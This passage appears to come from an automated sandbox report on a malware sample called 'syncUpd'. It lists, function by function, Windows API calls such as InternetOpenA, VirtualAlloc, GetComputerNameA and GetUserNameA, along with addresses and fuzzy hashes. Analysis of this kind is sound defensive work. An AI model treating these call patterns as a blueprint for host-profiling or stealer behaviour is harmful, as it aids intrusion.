• Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
  • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
  • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
  • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
• lstrlen.KERNEL32(00000000), ref: 0040B190
• lstrlen.KERNEL32(00000000), ref: 0040B1A4
  • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
  • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
  • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
  • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
• String ID:
• API String ID: 574041509-0
• Opcode ID: 6412797f300a884283d486a0320f7f58c85081bc8423b287f1b371c7783b466e
• Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
• Opcode Fuzzy Hash: 6412797f300a884283d486a0320f7f58c85081bc8423b287f1b371c7783b466e
• Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
• lstrlen.KERNEL32(00000000), ref: 0040AC1E
• lstrlen.KERNEL32(00000000), ref: 0040AC32
  • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
  • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
  • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
  • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
• String ID:
• API String ID: 3635112192-0
• Opcode ID: fef6c8789cd31f81e9383324ae63ffdec12e0a5ddde6342aa13fdff4a07eac6f
• Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
• Opcode Fuzzy Hash: fef6c8789cd31f81e9383324ae63ffdec12e0a5ddde6342aa13fdff4a07eac6f
• Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                  • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
• VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
• Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
• Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
• Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
• Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
• Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
• Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
• Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
• Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
• Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: FolderPathlstrcpy
• String ID:
• API String ID: 1699248803-0
• Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
• Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
• Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
• Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
  • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
  • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
  • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0071DA18,004136EB,0041D6E3), ref: 004143CD
  • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
  • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
• ExitProcess.KERNEL32 ref: 00401186
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Heap$Process$AllocName$ComputerExitUser
• String ID:
                                                                                                                                                                                                                                  • API String ID: 1004333139-0
                                                                                                                                                                                                                                  • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                  • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%